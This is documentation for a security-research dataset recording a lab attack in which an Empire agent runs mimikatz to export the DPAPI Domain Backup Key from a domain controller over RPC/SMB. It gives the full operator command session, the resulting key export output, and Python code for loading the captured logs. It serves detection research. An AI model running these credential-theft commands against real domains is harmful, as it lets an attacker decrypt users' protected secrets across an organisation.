Empire Mimikatz Backup Keys
Contents
Empire Mimikatz Backup Keys#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/05/18 |
Modification Date |
2020/09/21 |
Tactics |
|
Techniques |
|
Tags |
DPAPI,DPAPI Domain Backup key,RPC LSARPC |
Dataset Description#
This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
|
Network |
Adversary View#
(Empire: stager/multi/launcher) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener
---- -- ----------- ------------ -------- ------- --- ----- --------- ----------------
ALYH6ZB2 ps 172.18.39.5 WORKSTATION5 *THESHIRE\pgustavo powershell 4380 5/0.0 2020-10-22 18:24:28 http
(Empire: agents) > interact ALYH6ZB2
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/
cache* command dcsync_hashdump golden_ticket logonpasswords* mimitokens* purge silver_ticket
certs* dcsync extract_tickets keys* lsadump* pth* sam* trust_keys*
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export
(Empire: powershell/credentials/mimikatz/command) > execute
[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB
[*] Agent ALYH6ZB2 tasked with task ID 1
[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) >
Job started: 75WB4S
Hostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644
.#####. mimikatz 2.2.0 (x64) #19041 Oct 4 2020 10:28:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export
Current prefered key: {a0feda20-878f-4e68-ba74-d4df8f0191ab}
* RSA key
|Provider name : Microsoft Strong Cryptographic Provider
|Unique name :
|Implementation: CRYPT_IMPL_SOFTWARE ;
Algorithm : CALG_RSA_KEYX
Key size : 2048 (0x00000800)
Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
Exportable key : YES
Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'
PFX container : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'
Export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'
Compatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}
* Legacy key
daef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d
4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2
71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e
444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab
9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476
77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c
45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603
834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc
Export : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'
(Empire: powershell/credentials/mimikatz/command) >
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)